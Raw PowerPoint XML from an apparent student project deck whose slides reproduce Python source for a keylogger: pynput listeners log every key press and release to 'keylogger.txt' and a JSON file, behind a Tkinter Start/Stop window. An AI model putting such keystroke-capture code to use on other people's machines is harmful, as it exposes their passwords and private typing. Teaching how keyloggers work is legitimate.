              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>    keys = keys + str(key)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>generate_text_log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>(str(keys))</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>():</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>    global listener</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>keyboard.Listener</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0" err="1"/>
              <a:t>listener.start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12795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E2A3-77C7-CCFC-CAB4-6DAF56BBF1D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1219200"/>
            <a:ext cx="10681335" cy="4431983"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>start_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>(state='disabled')</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>stop_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>(state='normal')</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>():</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>    global listener</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>listener.stop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>(text="Keylogger stopped.")</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>start_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>(state='normal')</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>stop_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>(state='disabled')</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>root = Tk()</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>root.title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>("Keylogger")</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>label = Label(root, text='Click "Start" to begin keylogging.')</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>(anchor=CENTER)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0" err="1"/>
              <a:t>label.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2625086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TotalTime>
  <Words>829</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>75</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KOTA HARIKA SESHA MANI</vt:lpstr>
      <vt:lpstr>PROJECT TITLE</vt:lpstr>
      <vt:lpstr>AGENDA</vt:lpstr>
      <vt:lpstr>PROBLEM STATEMENT</vt:lpstr>
      <vt:lpstr>PROJECT OVERVIEW</vt:lpstr>
      <vt:lpstr>WHO ARE THE END USERS?</vt:lpstr>
      <vt:lpstr>YOUR SOLUTION AND ITS VALUE PROPOSITION</vt:lpstr>
      <vt:lpstr>def on_release(key):     global flag, keys_used, keys     keys_used.append(         {'Released': f'{key}'}     )      if flag == True:         flag = False     generate_json_file(keys_used)      keys = keys + str(key)     generate_text_log(str(keys))  def start_keylogger():     global listener     listener = keyboard.Listener(on_press=on_press, on_release=on_release)     listener.start()</vt:lpstr>
      <vt:lpstr>label.config(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")     start_button.config(state='disabled')     stop_button.config(state='normal')  def stop_keylogger():     global listener     listener.stop()     label.config(text="Keylogger stopped.")     start_button.config(state='normal')     stop_button.config(state='disabled')  root = Tk() root.title("Keylogger") label = Label(root, text='Click "Start" to begin keylogging.') label.config(anchor=CENTER) label.pack()</vt:lpstr>
      <vt:lpstr>start_button = Button(root, text="Start", command=start_keylogger) start_button.pack(side=LEFT)  stop_button = Button(root, text="Stop", command=stop_keylogger, state='disabled') stop_button.pack(side=RIGHT)  root.geometry("250x250")  root.mainloop() </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KOTA HARIKA SESHA MANI</dc:title>
  <cp:lastModifiedBy>harika sesha mani kota</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-03T05:48:59Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-13T06:49:58Z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